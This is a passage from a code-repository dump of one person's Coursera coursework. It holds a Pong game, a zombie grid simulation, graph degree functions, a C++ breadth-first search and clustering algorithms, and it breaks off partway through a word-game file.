new_zombie_locs = []\n # iterate over all zombie locations using it's generator \n for zombie in self.zombies():\n # initialize the current zombie location as the \n # location that minimizes its distance from nearest\n # human\n best_loc = zombie\n # intialize the current zombie location's distance\n # on the human distance field as the minimum distance.\n # This location becomes nearest location to human\n # if no neigbhoring cells are smaller than this distance\n min_dis = human_distance_field[zombie[0]][zombie[1]]\n # get all the neigboring cells of the current zombie\n neighbors = poc_grid.Grid.four_neighbors(self, \n zombie[0], zombie[1])\n # iterate over all neigboring cells to find which \n # neigboring cell minimize the current zombie's\n # distance from the nearest human\n for neighbor in neighbors:\n if (poc_grid.Grid.is_empty(self, \n neighbor[0], \n neighbor[1]) \n and human_distance_field[neighbor[0]][neighbor[1]] < min_dis):\n min_dis = human_distance_field[neighbor[0]][neighbor[1]]\n best_loc = neighbor\n \n # store this location that minimizes current zombie's\n # distance from the nearest human. \n new_zombie_locs += [best_loc]\n\n self._zombie_list = new_zombie_locs\n\n\n# Start up gui for simulation - You will need to write some code above\n# before this will work without errors\n\npoc_zombie_gui.run_gui(Apocalypse(30, 40))\n\n\n\n"
},
{
"alpha_fraction": 0.8100558519363403,
"alphanum_fraction": 0.8100558519363403,
"avg_line_length": 35,
"blob_id": "dd21695a42bbc226043167dda65e94200393cfdc",
"content_id": "ac501df097e1773103eac005a33241618c3ea902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 5,
"path": "/Fundamentals of Computing Specialization/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Fundamentals of Computing Specialization courses offered by Rice on Coursera\n\nAll the mini-projects run on the CodeSkulptor environment found at:\n\n<http://www.codeskulptor.org/>"
},
{
"alpha_fraction": 0.5673282146453857,
"alphanum_fraction": 0.5868702530860901,
"avg_line_length": 27.728069305419922,
"blob_id": "aad3699c0cd74147395663c37bb86fa4e7a47ccd",
"content_id": "d4a646b7422260c7927810d451b07815c00429aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3275,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 114,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/alg_project1_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFunctions for Prject #1: \"Degree Distribution for Graphs\". These functions will be\nused in the Application #1: \"Analysis of Citation Graphs\"\n\"\"\"\n\n# define directed graph constants for testing\nEX_GRAPH0 = {\n 0 : set([1, 2]),\n 1 : set(),\n 2 : set(),\n }\n\nEX_GRAPH1 = {\n 0 : set([1, 4, 5]),\n 1 : set([2, 6]),\n 2 : set([3]),\n 3 : set([0]),\n 4 : set([1]),\n 5 : set([2]),\n 6 : set([]),\n }\n\nEX_GRAPH2 = {\n 0 : set([1, 4, 5]),\n 1 : set([2, 6]),\n 2 : set([3, 7]),\n 3 : set([7]),\n 4 : set([1]),\n 5 : set([2]),\n 6 : set(),\n 7 : set([3]),\n 8 : set([1, 2]),\n 9 : set([0, 3, 4, 5, 6, 7]),\n }\n\ndef make_complete_graph(num_nodes):\n \"\"\"\n create and return a complete graph with nodes from\n 0 to num_nodes - 1 for num_nodes > 0. Otherwise\n the function returns a dictionary corresponding to\n the empty graph\n\n Arguments:\n num_nodes {integer} -- number of nodes for the graph\n\n Returns:\n dictionary -- returns a dictionary corresponding to a complete directed\n graph with the specified number of nodes.\n \"\"\"\n # local variable for the complete graph\n graph = {}\n\n # return an empty graph if num_nodes is not positive\n if num_nodes <= 0:\n return graph\n\n for node in range(num_nodes):\n # create an adjacency list for a directed complete graph with no\n # self loops or parallel edges\n graph[node] = set([val for val in range(num_nodes) if val != node])\n\n return graph\n\ndef compute_in_degrees(digraph):\n \"\"\"\n computes the in-degree of the nodes in a graph\n\n Arguments:\n digraph {dictionary} -- a directed graph with no self loop or parallel edges\n\n Returns:\n dictionary -- returns a dictionary with same set of keys(nodes) as digraph\n whose corresponding values are the number of edges whose\n head matches a particular node\n\n \"\"\"\n\n # initialize the in degree for the nodes of digraph to 0\n in_degree = dict(zip(digraph.keys(), len(digraph) * [0]))\n\n for tail_node in digraph:\n for head_node in digraph[tail_node]:\n in_degree[head_node] += 1\n\n return in_degree\n\ndef in_degree_distribution(digraph):\n \"\"\"\n computes the unnormalized distribution of the in-degrees of the graph\n\n Arguments:\n digraph {dictionary} -- a directed graph with no self loops or parallel\n edges\n\n Returns:\n dictionary -- unnormalized distribution of the in-degrees of the graph\n with key being the in-degree of nodes in the graph and\n the value associated with each particular in-degree is\n the number of nodes with that in-degree. In-degrees with\n no corresponding nodes in the graph are not included in\n the dictionary.\n \"\"\"\n # initialize the dictionary to store\n in_degree_dist = {}\n # get the in-degree for each node\n in_degrees = compute_in_degrees(digraph)\n\n for degree_vals in in_degrees.values():\n if in_degree_dist.has_key(degree_vals):\n in_degree_dist[degree_vals] += 1\n else:\n in_degree_dist[degree_vals] = 1\n\n return in_degree_dist\n"
},
{
"alpha_fraction": 0.5561786890029907,
"alphanum_fraction": 0.5880874395370483,
"avg_line_length": 31.727848052978516,
"blob_id": "4643d9bb45e7e9fd822c20764bac3ff21d05a514",
"content_id": "3353216b4d389766de79e981dff271fd7e92ab1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5171,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 158,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project4 Pong/pong.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Implementation of classic arcade game Pong\n\nimport simplegui\nimport random\n\n# initialize globals - pos and vel encode vertical info for paddles\nWIDTH = 600\nHEIGHT = 400 \nBALL_RADIUS = 20\nPAD_WIDTH = 8\nPAD_HEIGHT = 80\nHALF_PAD_WIDTH = PAD_WIDTH / 2\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\nLEFT = False\nRIGHT = True\nball_pos = [WIDTH / 2, HEIGHT / 2]\nball_vel = [5, 5] # pixels per update (1/60 seconds)\npaddle1_pos = HEIGHT/2 - HALF_PAD_HEIGHT\npaddle2_pos = HEIGHT/2 - HALF_PAD_HEIGHT\npaddle1_vel = 0\npaddle2_vel = 0\nscore1 = 0\nscore2 = 0\nPAD_VEL = 4\n\n# initialize ball_pos and ball_vel for new bal in middle of table\n# if direction is RIGHT, the ball's velocity is upper right, else upper left\ndef spawn_ball(direction):\n global ball_pos, ball_vel # these are vectors stored as lists\n \n ball_pos[0] = WIDTH / 2\n ball_pos[1] = HEIGHT / 2\n \n ball_vel[0] = random.randrange(2, 4)\n ball_vel[1] = -random.randrange(1, 3)\n \n # change the horizontal velocity direction if the ball needs to be spawn in the LEFT direction\n if (direction == LEFT):\n ball_vel[0] = -ball_vel[0]\n\n# define event handlers\ndef new_game():\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel # these are numbers\n global score1, score2 # these are ints\n # reset the scores\n score1 = 0\n score2 = 0\n # spawn ball in random direction\n spawn_ball(random.randrange(LEFT,RIGHT+1)) \n\ndef draw(canvas):\n global score1, score2, paddle1_pos, paddle2_pos, ball_pos, ball_vel\n \n # draw mid line and gutters\n canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, \"White\")\n canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, \"White\")\n canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, \"White\")\n \n # Update ball position\n ball_pos[0] += ball_vel[0]\n ball_pos[1] += ball_vel[1]\n \n # determine whether paddle and ball collide \n if (ball_pos[0] <= BALL_RADIUS + PAD_WIDTH):\n # ball is touching or passed the left side of the canvas\n if ( ball_pos[1] - BALL_RADIUS > paddle1_pos + PAD_HEIGHT or ball_pos[1] + BALL_RADIUS < paddle1_pos ):\n spawn_ball(RIGHT)\n score2 += 1\n else:\n ball_vel[0] = -1.1* ball_vel[0]\n ball_vel[1] = 1.1*ball_vel[1]\n \n elif ball_pos[0] >= WIDTH - BALL_RADIUS - PAD_WIDTH:\n # ball is touching or passed the right side of the canvas\n if ( ball_pos[1] - BALL_RADIUS > paddle2_pos + PAD_HEIGHT or ball_pos[1] + BALL_RADIUS < paddle2_pos ):\n spawn_ball(LEFT)\n score1 +=1\n else:\n ball_vel[0] = -1.1*ball_vel[0] \n ball_vel[1] = 1.1*ball_vel[1]\n \n # reflect the ball when colliding with the top or bottom of the canvas \n if (ball_pos[1] >= HEIGHT - BALL_RADIUS):\n ball_vel[1] = -ball_vel[1]\n \n elif ( ball_pos[1] <= BALL_RADIUS):\n ball_vel[1] = -ball_vel[1]\n \n # draw the scores so before ball so that it is behind the ball \n canvas.draw_text(str(score1), (WIDTH/4, HEIGHT/8), 40, 'White')\n canvas.draw_text(str(score2), (WIDTH*3.0/4, HEIGHT/8), 40, 'White') \n \n # draw ball\n canvas.draw_circle(ball_pos, BALL_RADIUS, 1, \"White\", \"White\")\n \n # update paddle's vertical position, keep paddle on the screen\n paddle1_pos += paddle1_vel\n paddle2_pos += paddle2_vel\n \n if (paddle1_pos < 0 ):\n paddle1_pos = 0\n elif (paddle1_pos > HEIGHT - PAD_HEIGHT):\n paddle1_pos = HEIGHT - PAD_HEIGHT\n \n if (paddle2_pos < 0 ):\n paddle2_pos = 0\n elif (paddle2_pos > HEIGHT - PAD_HEIGHT):\n paddle2_pos = HEIGHT - PAD_HEIGHT \n \n # draw paddles\n canvas.draw_polygon([[0, paddle1_pos], [PAD_WIDTH, paddle1_pos],\n [PAD_WIDTH,paddle1_pos + PAD_HEIGHT],\n [0, paddle1_pos + PAD_HEIGHT]], 1, 'White', 'White')\n \n canvas.draw_polygon([[WIDTH - PAD_WIDTH, paddle2_pos], [WIDTH, paddle2_pos],\n [WIDTH, paddle2_pos + PAD_HEIGHT],\n [WIDTH - PAD_WIDTH, paddle2_pos + PAD_HEIGHT]], 1, 'White', 'White')\n \ndef keydown(key):\n global paddle1_vel, paddle2_vel\n \n if (key == simplegui.KEY_MAP[\"down\"]):\n paddle2_vel += PAD_VEL\n \n if (key == simplegui.KEY_MAP[\"up\"]):\n paddle2_vel -= PAD_VEL\n\n if (key == simplegui.KEY_MAP[\"s\"]):\n paddle1_vel += PAD_VEL\n \n if (key == simplegui.KEY_MAP[\"w\"]):\n paddle1_vel -= PAD_VEL\n \ndef keyup(key):\n global paddle1_vel, paddle2_vel\n \n if (key == simplegui.KEY_MAP[\"down\"]):\n paddle2_vel = 0\n \n if (key == simplegui.KEY_MAP[\"up\"]):\n paddle2_vel = 0\n \n if (key == simplegui.KEY_MAP[\"s\"]):\n paddle1_vel = 0\n \n if (key == simplegui.KEY_MAP[\"w\"]):\n paddle1_vel = 0\n \n# create frame\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\nrestartButton = frame.add_button('restart', new_game)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\n\n# start frame\nnew_game()\nframe.start()\n"
},
{
"alpha_fraction": 0.5346689820289612,
"alphanum_fraction": 0.5752612948417664,
"avg_line_length": 28.53191566467285,
"blob_id": "601c2b92bb3702ffac4ba237922e8205a3cc5ff0",
"content_id": "f1436a42f575eff8b0f05221e5de3f230df9df48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5752,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 188,
"path": "/Algorithms on Graphs/Assignment3/bfs.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: bfs.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-10\r\n// description: Problem 1 of the third assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Given an undirected graph with n vertices and m edges and two vertices \r\n//\t\t\t\tu and v, compute the length of a shortest path between u and v(that is, the minimum \r\n//\t\t\t\tnumber of edges in a path from u to v).\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format. The next line contains two vertices u and v\r\n//\r\n//\t\t\t\tOutput: the minimum number of edges in a path from u to v, or −1 if there is no path\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tdistance function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.17/2.00 sec, max memory used: 40/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <queue>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\n\r\n// Performs breath first search to finds the length of the shortest path between\r\n// vertice s and t of a given undirected graph adj\r\n//\r\n// PRE: 2 ≤ n ≤ 10e5; 0 ≤ m ≤ 10e5; t != s; 0 <= t,s < n (note that m = edges of undirected graph\r\n//\t\tadj and n = size of adj)\r\n// POST: return the shortest path between s and t if there exists one or -1 otherwise if s and t are not connected\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t s = a vertice of the graph adj\r\n//\t\t t = another vertice of the graph adj (t != s)\r\n\r\nint distance(vector<vector<int> > &adj, int s, int t) {\r\n\r\n\t//intialize an empty queue\r\n\tqueue<int> myQueue;\r\n\t//intialize a vector of pairs of int and bool. Index of the vector represents the vertice number, int represents the\r\n\t//current minimum distance to reach that vertice from s and bool represent whether that vertice has been visited yet.\r\n\tvector<pair<int, bool>> dist(adj.size(), std::make_pair(0, false));\r\n\t//set the start vertice s as visited \r\n\tdist[s].second = true;\r\n\t//push the start vertice onto the queue\r\n\tmyQueue.push(s);\r\n\t//intialize a variable to keep track of the current vertice\r\n\tint w;\r\n\r\n\t//while queue is not empty\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\t//get the vertice from the front of the queue\r\n\t\tw = myQueue.front();\r\n\r\n\t\t//if the current vertice is the same as the target vertice, return the distance of that vertice. \r\n\t\t//this is the shorted distance from s to t\r\n\t\tif (w == t)\r\n\t\t\treturn dist[t].first;\r\n\r\n\t\t//remove the vertice from the front\r\n\t\tmyQueue.pop();\r\n\r\n\t\t//for all vertices (adj[w][v]) reachable from w\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\r\n\t\t\t//if the current vertice has not yet been visited\r\n\t\t\tif (dist[adj[w][v]].second == false) {\r\n\t\t\t\t\r\n\t\t\t\t//mark it as visited\r\n\t\t\t\tdist[adj[w][v]].second = true;\r\n\t\t\t\t//push this vertice onto the queue\r\n\t\t\t\tmyQueue.push(adj[w][v]);\r\n\t\t\t\t//update the distance of this vertice from w. Since all edges have same weight, we just add 1\r\n\t\t\t\t//to the distance at w.\r\n\t\t\t\tdist[adj[w][v]].first = dist[w].first + 1;\r\n\t\t\t\t\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\t\r\n\treturn -1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tint s, t;\r\n\tstd::cin >> s >> t;\r\n\ts--, t--;\r\n\tstd::cout << distance(adj, s, t);\r\n\t\r\n\t\r\n\r\n\t// Few test case to check if the distance function works. These are commented since the \r\n\t// assignment requires the bfs.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\t//Test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(2 - 1);\r\n\r\n\tif (distance(adj1, 4 - 1, 2 - 1) == 2)\r\n\t\tstd::cout << \"Test 1 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 Failed\" << std::endl;\r\n\r\n\t//Test2\r\n\tif (distance(adj1, 4 - 1, 3 - 1) == 2)\r\n\t\tstd::cout << \"Test 2 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 Failed\" << std::endl;\r\n\r\n\t//Test 3\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tadj2[2 - 1].push_back(1 - 1);\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\r\n\tadj2[1 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\tadj2[1 - 1].push_back(4 - 1);\r\n\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(5 - 1);\r\n\r\n\tadj2[5 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(5 - 1);\r\n\t\r\n\tif (distance(adj2, 4 - 1, 5 - 1) == 2)\r\n\t\tstd::cout << \"Test 3 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 3 Failed\" << std::endl;\r\n\r\n\t//Test 4\r\n\tvector<vector<int> > adj3(5, vector<int>());\r\n\tadj3[5 - 1].push_back(2 - 1);\r\n\tadj3[2 - 1].push_back(5 - 1);\r\n\r\n\tadj3[1 - 1].push_back(3 - 1);\r\n\tadj3[3 - 1].push_back(1 - 1);\r\n\r\n\tadj3[3 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tadj3[1 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tif (distance(adj3, 3 - 1, 5 - 1) == -1)\r\n\t\tstd::cout << \"Test 4 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 4 Failed\" << std::endl;\r\n\r\n\t****************************************************************************************************/\r\n\r\n\t\r\n}\r\n"
},
{
"alpha_fraction": 0.6077950596809387,
"alphanum_fraction": 0.6187032461166382,
"avg_line_length": 43.81867980957031,
"blob_id": "11f5de7bfca7cea81aaf6d1ba4c085bfc0e02964",
"content_id": "7f38410c79f3da77f0586c6e1e7141b132786f72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8159,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 182,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 3/alg_project3_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAll the algorithms for Project 3 for closest\npair and clustering \n\"\"\"\n\nimport alg_cluster\n\n######################################################\n# Code for closest pairs of clusters\ndef slow_closest_pair(cluster_list):\n \"\"\"\n Uses the brute-force algorithm (O(n^2)) to find the closest pair of clusters in a list\n \n Arguments:\n cluster_list {Cluster} -- a list of Cluster objects\n \n Returns:\n tuple -- returns a closest pair where the pair is represented by the tuple \n (dist, idx1, idx2) with idx1 < idx2 where dist is the distance between \n the closest pair cluster_list[idx1] and cluster_list[idx2].\n \"\"\"\n # initialize the tuple that will store the closest pair of cluster distance and index\n (dist, idx1, idx2) = (float(\"inf\"), -1, -1)\n \n for clusteri_idx in range(len(cluster_list)):\n for clusterj_idx in range(len(cluster_list)):\n if (clusteri_idx != clusterj_idx):\n curr_dist = cluster_list[clusteri_idx].distance(cluster_list[clusterj_idx])\n (dist, idx1, idx2) = (min(set([(dist, idx1, idx2), (curr_dist, clusteri_idx, clusterj_idx)]), \n key = lambda tup: tup[0]))\n\n if (idx2 > idx1):\n return (dist, idx1, idx2)\n else:\n return (dist, idx2, idx1)\n\ndef fast_closest_pair(cluster_list):\n \"\"\"\n Compute the distance between the closest pair of clusters in a list using fast algorithm \n [O(n*(logn)^2]\n \n Arguments:\n cluster_list {list} -- list of clusters sorted based on the horizontal distance of \n their centers in ascending order\n \n Returns:\n tuple -- tuple of the form (dist, idx1, idx2) where the centers of the clusters\n cluster_list[idx1] and cluster_list[idx2] have minimum distance dist.\n \"\"\"\n\n # base case \n if len(cluster_list) <= 3:\n (dist, idx1, idx2) = slow_closest_pair(cluster_list)\n\n # inductive case \n else:\n # divide the problem in half, solve it and then merge the results from both\n idx_m = len(cluster_list) / 2\n # solve for the left half of the cluster list\n (d_left, idxi_l, idxj_l) = fast_closest_pair(cluster_list[ : idx_m]) \n # solve for right half of the cluster list\n (d_right, idxi_r, idxj_r) = fast_closest_pair(cluster_list[idx_m : ])\n # find the minimum of the left and right paritiion minimum distances\n (dist, idx1, idx2) = (min(set([(d_left, idxi_l, idxj_l), (d_right, idxi_r + idx_m, idxj_r + idx_m)]), \n key = lambda tup: tup[0]))\n # find the the horizontal position of the strip's vertical center line i.e the midpoint of the\n # horizontal position of the last element of the left perition and first element of the right parition \n horiz_center = 0.5 * (cluster_list[idx_m - 1].horiz_center() + cluster_list[idx_m].horiz_center())\n # find the minimum of the minimum distance found earlier and the closest pair in the strip \n (dist, idx1, idx2) = (min(set([(dist, idx1, idx2), closest_pair_strip(cluster_list, horiz_center, dist)]), \n key = lambda tup: tup[0]))\n\n return (dist, idx1, idx2) \n\ndef closest_pair_strip(cluster_list, horiz_center, half_width) :\n \"\"\"\n Helper function to compute the closest pair of clusters in a vertical strip\n \n Arguments:\n cluster_list {list} -- a list of Cluster objects\n horiz_center {integer} -- the horizontal position of the strip's vertical center line \n half_width {integer} -- the half the width of the strip (i.e; the maximum horizontal distance\n that a cluster can lie from the center line)\n \n Returns:\n tuple -- returns a tuple of the form (dist, idx1, idx2) where the centers of the clusters\n cluster_list[idx1] and cluster_list[idx2] lie in the strip and have minimum distance dist. \n \"\"\"\n\n # store all cluster whose centres are within the vertical strip specified by horiz_center and half_width\n strip_clust = [(cluster_list[clst_idx], clst_idx) for clst_idx in range(len(cluster_list)) \n if abs(cluster_list[clst_idx].horiz_center() - horiz_center) < half_width ]\n \n # sort the cluster based on their vertical distances\n strip_clust.sort(key = lambda cluster: cluster[0].vert_center())\n\n # intialize the minimium ditance and their indices\n (dist, idx1, idx2) = (float(\"inf\"), -1, -1)\n\n # for each cluster inspect the next 3 ones and record the pair of cluster indices that\n # corresponds to closest pair thus found\n for clsti_idx in range(len(strip_clust) - 1):\n for clstj_idx in range(clsti_idx + 1, min((clsti_idx + 4), len(strip_clust))):\n curr_dist = strip_clust[clsti_idx][0].distance(strip_clust[clstj_idx][0])\n (dist, idx1, idx2) = (min(set([(dist, idx1, idx2), \n (curr_dist, strip_clust[clsti_idx][1], strip_clust[clstj_idx][1])]), key = lambda tup: tup[0]))\n \n # return minimum distance and their indicies (dist, idx1, idx2) where idx1 < idx2 \n if (idx2 > idx1):\n return (dist, idx1, idx2)\n else:\n return (dist, idx2, idx1)\n\n######################################################################\n# Code for hierarchical clustering\ndef hierarchical_clustering(cluster_list, num_clusters):\n \"\"\"\n Compute a hierarchical clustering of a set of clusters\n Note: the function mutates cluster_list to have length num_clusters \n \n Arguments:\n cluster_list {list} -- a list of Cluster objects\n num_clusters {integer} -- integer number of clusters to be made from cluster_list\n \n Returns:\n list -- a list of Cluster objects whose length is num_clusters\n \"\"\"\n\n while len(cluster_list) > num_clusters:\n # sort the cluster based on their horizontal distances\n #print cluster_list\n cluster_list.sort(key = lambda cluster: cluster.horiz_center())\n #print cluster_list\n (dummy_dist, idx1, idx2) = fast_closest_pair(cluster_list)\n cluster_list[idx1].merge_clusters(cluster_list[idx2])\n #print cluster_list\n cluster_list.pop(idx2)\n\n return cluster_list\n\n######################################################################\n# Code for k-means clustering\n\ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\n \"\"\"\n Compute the k-means clustering of a set of clusters\n Note: the function does not mutate cluster_list to have length num_clusters \n \n Arguments:\n cluster_list {list} -- a list of Cluster objects\n num_clusters {integer} -- integer number of clusters to be made from cluster_list\n num_iterations {integer} -- number of iterations\n \n Returns:\n list -- a list of Cluster objects whose length is num_clusters\n \"\"\"\n # compute an initial list of clusters with the property that each cluster consists of \n # a single county chosen from the set of the num_cluster counties with the largest populations\n cluster_list_cpy = list(cluster_list)\n cluster_list_cpy.sort(key = lambda cluster: cluster.total_population())\n cluster_len = len(cluster_list) \n old_cluster = cluster_list_cpy[cluster_len - num_clusters : ]\n \n for dummy_idx in range(num_iterations):\n # initialze an empty cluster \n new_cluster = [alg_cluster.Cluster(set(), 0.0, 0.0, 0, 0) for dummy_i in range(num_clusters)]\n for idx_i in range(cluster_len):\n min_dist = float(\"inf\")\n min_idx = -1\n # find the cluster from old_cluster and its index that is closest to current cluster \n # in the cluster_list\n for idx_j in range(num_clusters):\n curr_dist = old_cluster[idx_j].distance(cluster_list[idx_i])\n if curr_dist < min_dist:\n min_dist = curr_dist\n min_idx = idx_j\n # add the cluster to the new_cluster at index = min_idx\n new_cluster[min_idx].merge_clusters(cluster_list[idx_i])\n\n old_cluster = new_cluster\n \n return new_cluster\n\n\n"
},
{
"alpha_fraction": 0.6034660339355469,
"alphanum_fraction": 0.6195950508117676,
"avg_line_length": 30.44864845275879,
"blob_id": "b70edd07eb7d187527b5044547d655e6d268646f",
"content_id": "c02cf5d161fb2e3092e586a0658b56ed18286e3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5828,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 185,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project2 Word Wrangler/word_wrangler.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStudent code for Word Wrangler game\n\"\"\"\n\nimport urllib2\nimport codeskulptor\nimport poc_wrangler_provided as provided\n\nWORDFILE = \"assets_scrabble_words3.txt\"\n\n# Functions to manipulate ordered word lists\n\ndef remove_duplicates(list1):\n \"\"\"\n Eliminate duplicates in a sorted list.\n\n Returns a new sorted list with the same elements in list1, but\n with no duplicates.\n\n This function can be iterative.\n \"\"\"\n # create a variable to store the new list of no duplicates\n new_lst = []\n # iterate over the length of list1 adding the element to\n # the new_lst if there are duplicates\n for lst_idx in range(len(list1)):\n if (lst_idx < len(list1)-1 and list1[lst_idx+1] != list1[lst_idx]):\n new_lst += [list1[lst_idx]]\n # the last elemnt of the list needs to be added since it\n # will not be added to the new_lst\n elif (lst_idx == len(list1)-1):\n new_lst += [list1[lst_idx]]\n \n return new_lst\n\ndef intersect(list1, list2):\n \"\"\"\n Compute the intersection of two sorted lists.\n\n Returns a new sorted list containing only elements that are in\n both list1 and list2.\n\n This function can be iterative.\n \"\"\"\n # initialize the list which will contain the intersection\n inters_lst = []\n # initialize input list indices to move accross the list\n idx_list1 = 0\n idx_list2 = 0\n \n # since input lists are sorted, we can traverse the list\n # in O(n+m) i.e linear time. If current element in\n # list1 is smaller than list2, we move one index forward \n # in list1. If the current element in list1 is greater than\n # element in list2, we move one index in list2. If they are\n # the same in both lists, we store it in inters_lst and \n # move one index forward for both list. We continue\n # this until one of the input lists have been completely\n # traversed.\n while idx_list1 < len(list1) and idx_list2 < len(list2):\n if (list1[idx_list1] < list2[idx_list2]):\n idx_list1 += 1\n elif (list1[idx_list1] > list2[idx_list2]):\n idx_list2 += 1\n \n else:\n inters_lst += [list1[idx_list1]]\n idx_list1 += 1\n idx_list2 += 1\n \n return inters_lst\n\n# Functions to perform merge sort\n\ndef merge(list1, list2):\n \"\"\"\n Merge two sorted lists.\n\n Returns a new sorted list containing those elements that are in\n either list1 or list2.\n\n This function can be iterative.\n \"\"\"\n # copy the input lists so that the original lists are not \n # mutated\n copy_list1 = list(list1)\n copy_list2 = list(list2)\n # this will store the merged sorted list \n new_merge_lst = []\n # pop the elments from list by checking which one is smaller\n # and add the elements in asceding order to the new_merge_lst\n while (len(copy_list1) > 0 and len(copy_list2) > 0):\n if (copy_list1[0] < copy_list2[0]):\n new_merge_lst += [copy_list1.pop(0)]\n else:\n new_merge_lst += [copy_list2.pop(0)]\n \n \n new_merge_lst += copy_list1 + copy_list2\n \n return new_merge_lst\n \ndef merge_sort(list1):\n \"\"\"\n Sort the elements of list1.\n\n Return a new sorted list with the same elements as list1.\n\n This function should be recursive.\n \"\"\"\n # check the base case when list is empty or has one element\n # In this case the list1 is alreay sorted so we return it\n if len(list1) == 1 or len(list1) == 0:\n return list1\n # the inductive/recursive case requires us to break the list \n # into 2, and perform merge sort on these two\n # recursively to get left_half and the right_half. \n # Once we have two sorted list, we merge them by calling\n # merge function above\n else:\n lst_mid_idx = len(list1)/2\n left_half = merge_sort(list1[ : lst_mid_idx])\n right_half = merge_sort(list1[lst_mid_idx : ])\n return merge(left_half, right_half)\n \n\n# Function to generate all strings for the word wrangler game\n\ndef gen_all_strings(word):\n \"\"\"\n Generate all strings that can be composed from the letters in word\n in any order.\n\n Returns a list of all strings that can be formed from the letters\n in word.\n\n This function should be recursive.\n \"\"\"\n # base case is when string is empty\n if len(word) == 0 :\n return [\"\"]\n # recusive case involves performing the gen_all_strings \n # recursively on the word without the first character\n # and then adding the first character to all possible \n # locations in all strings in the list of strings\n # made up of string of word characters 